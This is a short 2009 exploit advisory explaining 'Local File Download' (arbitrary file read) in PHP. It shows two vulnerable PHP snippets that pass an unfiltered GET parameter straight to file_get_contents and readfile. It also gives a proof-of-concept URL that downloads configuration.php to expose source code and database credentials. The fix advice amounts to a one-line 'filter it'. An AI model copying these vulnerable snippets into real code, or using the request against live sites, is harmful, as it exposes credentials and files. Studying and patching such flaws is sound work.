# Exploit Title: Local File Download Theory
# Date: 29 December 2009
# Author: Ahlspiess
# Tested on: Linux, WindowsXP Sp3, FreeBSD

1 What's Local File Download(LFD)?
- Local file download is kind of misconfigured web master or webdeveloper on php application.

2 Effect

2.1 Personal/website
- You will able to view all php source code in plain text.
- php source code is such as mysql connection data, eg: host, username, password and database

3 vulnerable source code
- Example 1
<?php
header("Content-type: application/octet-stream");
header("Content-disposition: attachment; filename=".$_GET['tbdsec']);
echo file_get_contents($_GET['tbdsec']);
?>
- Example 2
<?php
$filename = $_GET['hmsec'];
header("Pragma: public");
header("Expires: 0");
header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
header("Content-Type: application/force-download");
header("Content-Type: application/octet-stream");
header("Content-Type: application/download");
header("Content-Disposition: attachment; filename=".basename($filename).";");
header("Content-Transfer-Encoding: binary");
header("Content-Length: ".filesize($filename));
@readfile($filename);
exit(0);
?>

4 Proof of Concept
- http://localhost/tbdsec.php?hmsec=configuration.php
- Download it, and open it.
- Walla! you able to all code in that page!

5 Patch code
- To admin/webmaster ask your web developer fix it :D

6 Suggestion
- Please don't you direct download, at least filter it.

7 Dork?
- No DORK For Script Kiddies

8 Thanks/Credits
- TDBSecurity(www.tbd.my<http://www.tbd.my>)
- HMSecurity(www.hmsecurity.org<http://www.hmsecurity.org>)
- Ahli Syurga Crew
- XShimeX
- Suhz
- And Google :D